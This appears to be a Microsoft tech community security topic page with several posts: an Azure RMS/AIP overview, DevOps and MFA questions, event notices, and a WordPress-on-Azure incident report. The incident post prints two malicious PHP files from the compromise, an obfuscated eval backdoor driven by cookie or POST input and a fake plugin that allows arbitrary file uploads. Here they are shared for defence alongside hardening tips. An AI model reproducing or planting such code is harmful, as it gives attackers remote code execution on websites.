security
15 TopicsEmpowering Data Security with Azure Rights Management and Azure Information Protection
In today’s digital world, data is one of the most valuable assets a business can have. Whether it’s customer information, financial records, or internal documents, keeping that data safe is absolutely necessary. As more companies move to cloud-based systems and work in hybrid environments, the need for smart and reliable data protection tools is growing fast. That’s where Azure Rights Management (RMS) and Azure Information Protection (AIP) come in. These tools help businesses organize, label, and secure their data across different platforms, making sure it stays protected no matter where it goes. Understanding Azure Rights Management (RMS) Azure RMS is a cloud-based service designed to safeguard digital information through encryption, identity, and authorization policies. It ensures that data remains protected regardless of where it resides—on a local device, in the cloud, or in transit. Core Protection Workflow The Azure RMS protection process is straightforward yet powerful: Encryption: When a user initiates protection, the content is encrypted using strong cryptographic standards. Policy Attachment: An access policy is embedded within the file, defining what actions are permitted (e.g., read-only, no print, no forward). Authentication: Access is granted only after successful authentication via Azure Active Directory (Azure AD). Decryption and Enforcement: Once authenticated, the file is decrypted and the access policy is enforced in real time. Encryption Standards in Use Azure RMS employs: AES 128-bit and 256-bit encryption for securing documents. RSA 2048-bit encryption for protecting customer-specific root keys. These standards ensure that even if data is intercepted, it remains unreadable and unusable without proper authorization. Azure Information Protection: Beyond Encryption While Azure RMS focuses on securing content, Azure Information Protection (AIP) adds a layer of intelligence through classification and labeling. AIP enables organizations to define and apply sensitivity labels that reflect the value and confidentiality of their data. From Classic to Unified Labeling Microsoft has transitioned from the classic AIP client to the Unified Labeling Client, which integrates directly with Microsoft 365 compliance solutions. This shift simplifies management and enhances compatibility with modern Office applications. Sensitivity Labels in Action Sensitivity labels help organizations manage data access and usage by categorizing content into levels such as: Public: Safe for public distribution. General: Internal use only. Confidential: Restricted to specific internal groups. Highly Confidential: Limited to named individuals with strict usage controls (e.g., no printing or downloading). Labels can be applied manually by users or automatically based on content inspection, context, or metadata. Built-In Labeling in Office Apps Modern Office apps now support built-in labeling, eliminating the need for separate add-ins. This native integration ensures a smoother user experience and reduces the risk of compatibility issues or performance degradation. Licensing Overview To leverage AIP features, organizations must have the appropriate licensing: Office 365 E3 and above: Basic classification and labeling. AIP Plan 1: Included in Microsoft 365 E3 and EMS E3. AIP Plan 2: Included in Microsoft 365 E5 and EMS E5, offering advanced capabilities like automatic labeling and document tracking. Real-World Use Cases Access Control: Limit access to sensitive documents based on user roles or departments. Version Management: Use labels to distinguish between draft and final versions. Automated Workflows: Trigger encryption or archiving when documents reach a certain sensitivity level. Why Azure Information Protection Matters Implementing AIP brings a host of benefits: Persistent Protection: Data remains secure even when shared externally or accessed offline. Granular Control: Define who can access data and what they can do with it. Visibility and Auditing: Monitor access patterns and revoke access if needed. Hybrid Compatibility: Protect data across cloud and on-premises environments using the Rights Management connector. Centralized Management: Streamline policy creation and enforcement across the organization. Conclusion Azure RMS and AIP together form a powerful duo for modern data protection. By combining encryption, identity management, and intelligent labeling, organizations can confidently secure their most valuable asset information while enabling seamless collaboration and compliance.72Views0likes0CommentsCI/CD pipeline permissions
We have many DevOps projects; one per software project. Is it possible to add a user or a group organization-wide or collection-wide, so they can manage the build & release pipelines for every project, without adding them to each project explicitly? The project collection has a role for build administrators, but none for release administrators.777Views0likes1CommentUsers asked for 2nd MFA method
Hi there, starting today a couple of users reported that, seemingly out of the blue, they're being asked to configure a second method for their MFA setup. For example, if a user has configured to to use MSFT Authenticator app, he will be asked to provide an additional method. This doesn't seem to be widespread yet and we couldn't reproduce thus far. Perhaps someone of you knows what could be causing this. Thanks.Solved2.8KViews0likes3CommentsAzure Bastion - News Comics
You are a Cloud lover? But you prefer Azure? Learning with fun? And most of all, you like establishing connections? (link removed by moderator) If you want to deep dive, do not hesitate to visit the official documentation on the Microsoft website: https://learn.microsoft.com/en-us/azure/bastion/bastion-overview (link removed by moderator)2KViews1like2CommentsAzure Sentinel Webinar: Threat Hunting
Interested in going threat hunting with Azure Sentinel? Check out our upcoming webinar. Details and registration at https://aka.ms/AzureSentinelWebinar. The webinar will take place on Wednesday, September 18, 2019 at 09:00 PT / 12:00 ET / 16:00 GMT. Afterward, we will post recordings of the webinar at https://aka.ms/AzureSentinelRecordings. To stay informed about future webinars and other events, join our Security Community at https://aka.ms/SecurityCommunity.920Views1like0CommentsMeetup: Deep dive into the new Azure Sentinel service!
If you are based in London or will be there on October 23, our Azure Sentinel team will co-host a free “Deep dive into the new Azure Sentinel service” meetup in the month of October. Meetup name: Deep dive into the new Azure Sentinel service Cost: Free Date: October 23rd, 2019 Time and Duration: 18:00 – 21:00 Location: The Microsoft Reactor London, 70 Wilson St. - London, UK Registration: https://lnkd.in/gvRTgpz There is a maximum capacity of 100 attendees, so if interested we suggest registering now.1.3KViews1like0CommentsSecurity on Azure Devops Self Hosted agent
Hello, Today I have discovered that is possible from the pipeline to deploy software directly on the agents without any kind of authentication, in my case I was able to deploy docker directly on a self-hosted agent by just using a bash script on the pipeline. Is it possible to deny this kind of deployments on a self-hosted agent from the pipeline without impacting any other deployments, pipelines, or releases? From the security perspective, it poses a risk, someone that has access to the pipelines deploy un-wanted software on an agent.Solved3.9KViews0likes1CommentMalware Wordpress on Azure
Recently received a security alert on a wordpress webapp running on Azure: 1. There was a non-recognized authentication as admin user 2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php 3. The user performed a "test" through the "plugin" Example of the code map.php: <?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}} Example of code apikey.php: <?php /** * @package api key */ /* Plugin Name: api key */ if ("hello"==$_GET["test"]) { echo "testtrue"; } if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]); echo "true"; } Image of the "Plugin" on the wordpress site: Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. Recommendations: . Enable Sucuri plugin on your WP . Enable WAF v2 on your webapp . If possible isolate your resource using App Service Environment . Harden NSG(s) . Perform a SSL Test on your web app If you have any other tip recommendation please share!1.9KViews0likes2CommentsHow to redirect from one URL to another URL adding a security token?
I would like to know, if there are any way with Azure Functions, Proxy... to redirect from one URL to another URL adding the accessToken?. I'm looking for something like this: https://myexample.azuresite.net/ -> redirect + adding security -> https://www.myexample.com/oauthCallback.html?token= Could you help me? Regards1.4KViews0likes0CommentsExecutive Customer Meetings (Security) at Microsoft Ignite the Tour in Washington, DC
We are providing the opportunity for US GCC High customers to request on-site meetings with Microsoft Cloud Security General Manager, Asaf Kashi, during Microsoft Ignite the Tour in Washington, DC on Feb 6-7, 2020. Details and signup here!999Views0likes1Comment